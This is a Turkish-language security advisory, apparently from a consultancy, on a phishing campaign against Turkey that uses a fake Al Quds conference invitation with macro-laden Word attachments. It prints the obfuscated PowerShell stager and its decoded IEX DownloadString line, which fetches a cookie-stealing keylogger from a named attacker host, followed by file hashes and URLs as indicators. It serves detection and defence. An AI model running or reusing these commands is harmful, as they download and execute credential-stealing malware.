Türkiye’yi Hedef Alan Yeni Oltalama Saldırısı

Tespit edilen yeni hedefli phishing(oltalama) saldırısı, insanları İstanbul’da “Parliamentarians for Al Quds” isimli derneğin gerçekten var olmayan 13-16 Aralık tarihlerindeki “Jerusalem is the eternal capital of Palestine” konferansa davet metni şeklinde ulaşıyor. Al Quds Parlamentosu, uluslararası parlamenterlerin Filistin davasını destekleme çabalarını koordine eden bir komite.

Zararlı Analizi

Mail ekinde gelen dokümanların ikiside macro çalıştırmak için kullanıcıdan izin ister.

Microsoft Word dokümanındaki zararlı uzak sunucu üzerinden çektiği .ps1 dosyasını çalıştıran powershell komutunu tetikler.

Komut satırında obfuscate edilmiş komut çalıştırılır;

“C:\Windows\System32\cmd.exe” /c ” EcHo iEx ( new-oBjeCt sYStem.Io.COmPreSSiON.defLAtEstreAm([system.Io.mEmorYStrEAM] [ConVerT]::fRomBaSE64STRing( ‘BcExEkAwEAXQq+hQSHotCg2FgjbWYolNJv6M63uv75asG PirxvViQjYwzMxr44UVpWnDpz64bUISPYr8BGJt7SOUwht2bA7OeNE7klGGdVEsvZQkIi9/’) , [sYsTEM.io.compressIOn.CoMpREssiOnmode]::DECOMPRESs )^^^| % {new-oBjeCt io.STreaMreader( $_, [TexT.ENCoDInG]::aSCii )} ).REadtOEnd() | pOwErSheLl -NoeX -nOlo -NOproFiLe -nOnIn -eXeCuTI BypAss -wiNdoWstYL hiDden -“

Komut deobfuscate edildiğinde;

IEX (New-Object Net.WebClient).DownloadString(‘http://microsoftdata.linkpc.net/api/cscript’)

komutu çalıştırıldığı tespit edilmiştir.

Powershell üzerinde;

http:// microsoftdata . linkpc.net/api/cscript

adresi üzerinden çekilen script çalıştırılır.

Kullanılan bu script kullanıcının bilgisayarı üzerindeki cookielerini çalmakta ve sistem üzerinde keylogger görevi görmektedir.

Script tarayıcıların yerel veritabanlarıyla etkileşimde bulunmak için gerekli sqlite DLL’lerini indirir.

Mail ekinde gelen dosyaların ve uzak sunucu üzerinden çekilen dosyaların imza bilgileri ve zararlının bağlandığı adresler;

FileHash-SHA2561d2bbe3fd9021bbed4667628b86156bee8763b3d93cdac6de398c751a281a324
FileHash-SHA2567a26d5b600a078816beb3a2849827fa7d45ec85ec6c3343b3857f10edfece74c
FileHash-SHA2567c8cf1e3ec35a6f604699f6481f3463e9ae19c93b8efd861b914c8260304d314
FileHash-SHA256bf4d4ee4a8e4472c7968586fa0318e556a89bfd94aeb4e72afd99ab340541770
FileHash-MD59d6ccae4ef4a206345005e58e51ca6cb
URL4host.publicvm.com/api/cscript
URLmicrosoftdata.linkpc.net
URLmicrosoftdata.linkpc.net/api/cscript

Yukarıda belirtilen adreslere erişimler engellenmeli ve zararlının bulaşma ihtimaline karşı imzalar ile sistemler üzerinde tarama yapılması önerilmektedir.

Size nasıl yardımcı olalım?

İhtiyacınız olan her an Prisma danışmanları yanı başınızda. Bizimle 7/24 iletişime geçebilirsiniz.


Sızma testi hizmetlerimizi incelediniz mi?